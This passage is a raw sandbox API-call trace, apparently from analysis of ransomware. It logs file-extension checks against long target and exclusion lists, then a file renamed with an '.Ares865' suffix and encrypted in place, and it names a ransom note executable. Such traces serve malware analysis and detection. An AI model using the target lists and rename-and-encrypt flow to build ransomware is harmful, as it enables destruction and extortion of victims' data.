(lpString1="ico", lpString2="owc") returned -1 [0085.879] lstrlenW (lpString="p96") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0085.879] lstrlenW (lpString="p97") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0085.879] lstrlenW (lpString="pan") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0085.879] lstrlenW (lpString="pdb") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0085.879] lstrlenW (lpString="pdm") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0085.879] lstrlenW (lpString="pnz") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0085.879] lstrlenW (lpString="qry") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0085.879] lstrlenW (lpString="qvd") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0085.879] lstrlenW (lpString="rbf") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0085.879] lstrlenW (lpString="rctd") returned 4 [0085.879] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0085.879] lstrlenW (lpString="rod") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0085.880] lstrlenW (lpString="rodx") returned 4 [0085.880] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0085.880] lstrlenW (lpString="rpd") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0085.880] lstrlenW (lpString="rsd") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0085.880] lstrlenW (lpString="sas7bdat") returned 8 [0085.880] lstrcmpiW (lpString1="Site.ico", lpString2="sas7bdat") returned 1 [0085.880] lstrlenW (lpString="sbf") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0085.880] lstrlenW (lpString="scx") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0085.880] lstrlenW (lpString="sdb") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0085.880] lstrlenW (lpString="sdc") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0085.880] lstrlenW (lpString="sdf") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0085.880] lstrlenW (lpString="sis") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0085.880] lstrlenW (lpString="spq") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0085.880] lstrlenW (lpString="te") returned 2 [0085.880] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0085.880] lstrlenW (lpString="teacher") returned 7 [0085.880] lstrcmpiW (lpString1="ite.ico", lpString2="teacher") returned -1 [0085.880] lstrlenW (lpString="tmd") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0085.880] lstrlenW (lpString="tps") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0085.880] lstrlenW (lpString="trc") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.880] lstrlenW (lpString="trc") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.880] lstrlenW (lpString="trm") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0085.880] lstrlenW (lpString="udb") returned 3 [0085.880] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0085.881] lstrlenW (lpString="udl") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0085.881] lstrlenW (lpString="usr") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0085.881] lstrlenW (lpString="v12") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0085.881] lstrlenW (lpString="vis") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0085.881] lstrlenW (lpString="vpd") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0085.881] lstrlenW (lpString="vvv") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0085.881] lstrlenW (lpString="wdb") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0085.881] lstrlenW (lpString="wmdb") returned 4 [0085.881] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0085.881] lstrlenW (lpString="wrk") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0085.881] lstrlenW (lpString="xdb") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0085.881] lstrlenW (lpString="xld") returned 3 [0085.881] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0085.881] lstrlenW (lpString="xmlff") returned 5 [0085.881] lstrcmpiW (lpString1="e.ico", lpString2="xmlff") returned -1 [0085.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.Ares865") returned 68 [0085.881] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico.ares865"), dwFlags=0x1) returned 1 [0085.883] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.883] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25214) returned 1 [0085.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.883] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.884] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.884] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.884] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6580, lpName=0x0) returned 0x15c [0085.885] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6580) returned 0x190000 [0085.887] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.888] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.889] CloseHandle (hObject=0x15c) returned 1 [0085.889] CloseHandle (hObject=0x118) returned 1 [0085.889] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.889] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.889] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.889] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="aoldtz.exe") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2=".") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="..") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="windows") returned -1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="bootmgr") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="temp") returned -1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="pagefile.sys") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="boot") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="ids.txt") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="ntuser.dat") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="perflogs") returned 1 [0085.889] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="MSBuild") returned 1 [0085.889] lstrlenW (lpString="SharePointTeamSite.ico") returned 22 [0085.890] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0085.890] lstrcpyW (in: lpString1=0x2cce448, lpString2="SharePointTeamSite.ico" | out: lpString1="SharePointTeamSite.ico") returned="SharePointTeamSite.ico" [0085.890] lstrlenW (lpString="SharePointTeamSite.ico") returned 22 [0085.890] lstrlenW (lpString="Ares865") returned 7 [0085.890] lstrcmpiW (lpString1="ite.ico", lpString2="Ares865") returned 1 [0085.890] lstrlenW (lpString=".dll") returned 4 [0085.890] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2=".dll") returned 1 [0085.890] lstrlenW (lpString=".lnk") returned 4 [0085.890] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2=".lnk") returned 1 [0085.890] lstrlenW (lpString=".ini") returned 4 [0085.890] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2=".ini") returned 1 [0085.890] lstrlenW (lpString=".sys") returned 4 [0085.890] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2=".sys") returned 1 [0085.890] lstrlenW (lpString="SharePointTeamSite.ico") returned 22 [0085.890] lstrlenW (lpString="bak") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0085.890] lstrlenW (lpString="ba_") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0085.890] lstrlenW (lpString="dbb") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0085.890] lstrlenW (lpString="vmdk") returned 4 [0085.890] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0085.890] lstrlenW (lpString="rar") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0085.890] lstrlenW (lpString="zip") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0085.890] lstrlenW (lpString="tgz") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0085.890] lstrlenW (lpString="vbox") returned 4 [0085.890] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0085.890] lstrlenW (lpString="vdi") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0085.890] lstrlenW (lpString="vhd") returned 3 [0085.890] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0085.890] lstrlenW (lpString="vhdx") returned 4 [0085.890] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0085.890] lstrlenW (lpString="avhd") returned 4 [0085.890] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0085.891] lstrlenW (lpString="db") returned 2 [0085.891] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0085.891] lstrlenW (lpString="db2") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0085.891] lstrlenW (lpString="db3") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0085.891] lstrlenW (lpString="dbf") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0085.891] lstrlenW (lpString="mdf") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0085.891] lstrlenW (lpString="mdb") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0085.891] lstrlenW (lpString="sql") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0085.891] lstrlenW (lpString="sqlite") returned 6 [0085.891] lstrcmpiW (lpString1="te.ico", lpString2="sqlite") returned 1 [0085.891] lstrlenW (lpString="sqlite3") returned 7 [0085.891] lstrcmpiW (lpString1="ite.ico", lpString2="sqlite3") returned -1 [0085.891] lstrlenW (lpString="sqlitedb") returned 8 [0085.891] lstrcmpiW (lpString1="Site.ico", lpString2="sqlitedb") returned -1 [0085.891] lstrlenW (lpString="xml") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0085.891] lstrlenW (lpString="$er") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0085.891] lstrlenW (lpString="4dd") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0085.891] lstrlenW (lpString="4dl") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0085.891] lstrlenW (lpString="^^^") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0085.891] lstrlenW (lpString="abs") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0085.891] lstrlenW (lpString="abx") returned 3 [0085.891] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0085.891] lstrlenW (lpString="accdb") returned 5 [0085.891] lstrcmpiW (lpString1="e.ico", lpString2="accdb") returned 1 [0085.891] lstrlenW (lpString="accdc") returned 5 [0085.891] lstrcmpiW (lpString1="e.ico", lpString2="accdc") returned 1 [0085.892] lstrlenW (lpString="accde") returned 5 [0085.892] lstrcmpiW (lpString1="e.ico", lpString2="accde") returned 1 [0085.892] lstrlenW (lpString="accdr") returned 5 [0085.892] lstrcmpiW (lpString1="e.ico", lpString2="accdr") returned 1 [0085.892] lstrlenW (lpString="accdt") returned 5 [0085.892] lstrcmpiW (lpString1="e.ico", lpString2="accdt") returned 1 [0085.892] lstrlenW (lpString="accdw") returned 5 [0085.892] lstrcmpiW (lpString1="e.ico", lpString2="accdw") returned 1 [0085.892] lstrlenW (lpString="accft") returned 5 [0085.892] lstrcmpiW (lpString1="e.ico", lpString2="accft") returned 1 [0085.892] lstrlenW (lpString="adb") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.892] lstrlenW (lpString="adb") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.892] lstrlenW (lpString="ade") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0085.892] lstrlenW (lpString="adf") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0085.892] lstrlenW (lpString="adn") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0085.892] lstrlenW (lpString="adp") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0085.892] lstrlenW (lpString="alf") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0085.892] lstrlenW (lpString="ask") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0085.892] lstrlenW (lpString="btr") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0085.892] lstrlenW (lpString="cat") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0085.892] lstrlenW (lpString="cdb") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0085.892] lstrlenW (lpString="ckp") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0085.892] lstrlenW (lpString="cma") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0085.892] lstrlenW (lpString="cpd") returned 3 [0085.892] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0085.893] lstrlenW (lpString="dacpac") returned 6 [0085.893] lstrcmpiW (lpString1="te.ico", lpString2="dacpac") returned 1 [0085.893] lstrlenW (lpString="dad") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0085.893] lstrlenW (lpString="dadiagrams") returned 10 [0085.893] lstrcmpiW (lpString1="amSite.ico", lpString2="dadiagrams") returned -1 [0085.893] lstrlenW (lpString="daschema") returned 8 [0085.893] lstrcmpiW (lpString1="Site.ico", lpString2="daschema") returned 1 [0085.893] lstrlenW (lpString="db-journal") returned 10 [0085.893] lstrcmpiW (lpString1="amSite.ico", lpString2="db-journal") returned -1 [0085.893] lstrlenW (lpString="db-shm") returned 6 [0085.893] lstrcmpiW (lpString1="te.ico", lpString2="db-shm") returned 1 [0085.893] lstrlenW (lpString="db-wal") returned 6 [0085.893] lstrcmpiW (lpString1="te.ico", lpString2="db-wal") returned 1 [0085.893] lstrlenW (lpString="dbc") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0085.893] lstrlenW (lpString="dbs") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0085.893] lstrlenW (lpString="dbt") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0085.893] lstrlenW (lpString="dbv") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0085.893] lstrlenW (lpString="dbx") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0085.893] lstrlenW (lpString="dcb") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0085.893] lstrlenW (lpString="dct") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0085.893] lstrlenW (lpString="dcx") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0085.893] lstrlenW (lpString="ddl") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0085.893] lstrlenW (lpString="dlis") returned 4 [0085.893] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0085.893] lstrlenW (lpString="dp1") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0085.893] lstrlenW (lpString="dqy") returned 3 [0085.893] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0085.893] lstrlenW (lpString="dsk") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0085.894] lstrlenW (lpString="dsn") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0085.894] lstrlenW (lpString="dtsx") returned 4 [0085.894] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0085.894] lstrlenW (lpString="dxl") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0085.894] lstrlenW (lpString="eco") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0085.894] lstrlenW (lpString="ecx") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0085.894] lstrlenW (lpString="edb") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0085.894] lstrlenW (lpString="epim") returned 4 [0085.894] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0085.894] lstrlenW (lpString="fcd") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0085.894] lstrlenW (lpString="fdb") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0085.894] lstrlenW (lpString="fic") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0085.894] lstrlenW (lpString="flexolibrary") returned 12 [0085.894] lstrcmpiW (lpString1="TeamSite.ico", lpString2="flexolibrary") returned 1 [0085.894] lstrlenW (lpString="fm5") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0085.894] lstrlenW (lpString="fmp") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0085.894] lstrlenW (lpString="fmp12") returned 5 [0085.894] lstrcmpiW (lpString1="e.ico", lpString2="fmp12") returned -1 [0085.894] lstrlenW (lpString="fmpsl") returned 5 [0085.894] lstrcmpiW (lpString1="e.ico", lpString2="fmpsl") returned -1 [0085.894] lstrlenW (lpString="fol") returned 3 [0085.894] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0085.895] lstrlenW (lpString="fp3") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0085.895] lstrlenW (lpString="fp4") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0085.895] lstrlenW (lpString="fp5") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0085.895] lstrlenW (lpString="fp7") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0085.895] lstrlenW (lpString="fpt") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0085.895] lstrlenW (lpString="frm") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0085.895] lstrlenW (lpString="gdb") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.895] lstrlenW (lpString="gdb") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.895] lstrlenW (lpString="grdb") returned 4 [0085.895] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0085.895] lstrlenW (lpString="gwi") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0085.895] lstrlenW (lpString="hdb") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0085.895] lstrlenW (lpString="his") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0085.895] lstrlenW (lpString="ib") returned 2 [0085.895] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0085.895] lstrlenW (lpString="idb") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0085.895] lstrlenW (lpString="ihx") returned 3 [0085.895] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0085.895] lstrlenW (lpString="itdb") returned 4 [0085.896] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0085.896] lstrlenW (lpString="itw") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0085.896] lstrlenW (lpString="jet") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0085.896] lstrlenW (lpString="jtx") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0085.896] lstrlenW (lpString="kdb") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0085.896] lstrlenW (lpString="kexi") returned 4 [0085.896] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0085.896] lstrlenW (lpString="kexic") returned 5 [0085.896] lstrcmpiW (lpString1="e.ico", lpString2="kexic") returned -1 [0085.896] lstrlenW (lpString="kexis") returned 5 [0085.896] lstrcmpiW (lpString1="e.ico", lpString2="kexis") returned -1 [0085.896] lstrlenW (lpString="lgc") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0085.896] lstrlenW (lpString="lwx") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0085.896] lstrlenW (lpString="maf") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0085.896] lstrlenW (lpString="maq") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0085.896] lstrlenW (lpString="mar") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0085.896] lstrlenW (lpString="marshal") returned 7 [0085.896] lstrcmpiW (lpString1="ite.ico", lpString2="marshal") returned -1 [0085.896] lstrlenW (lpString="mas") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0085.896] lstrlenW (lpString="mav") returned 3 [0085.896] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0085.897] lstrlenW (lpString="maw") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0085.897] lstrlenW (lpString="mdbhtml") returned 7 [0085.897] lstrcmpiW (lpString1="ite.ico", lpString2="mdbhtml") returned -1 [0085.897] lstrlenW (lpString="mdn") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0085.897] lstrlenW (lpString="mdt") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0085.897] lstrlenW (lpString="mfd") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0085.897] lstrlenW (lpString="mpd") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0085.897] lstrlenW (lpString="mrg") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0085.897] lstrlenW (lpString="mud") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0085.897] lstrlenW (lpString="mwb") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0085.897] lstrlenW (lpString="myd") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0085.897] lstrlenW (lpString="ndf") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0085.897] lstrlenW (lpString="nnt") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0085.897] lstrlenW (lpString="nrmlib") returned 6 [0085.897] lstrcmpiW (lpString1="te.ico", lpString2="nrmlib") returned 1 [0085.897] lstrlenW (lpString="ns2") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0085.897] lstrlenW (lpString="ns3") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0085.897] lstrlenW (lpString="ns4") returned 3 [0085.897] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0085.897] lstrlenW (lpString="nsf") returned 3 [0085.897] lstrcmpiW (lpString1="ico", 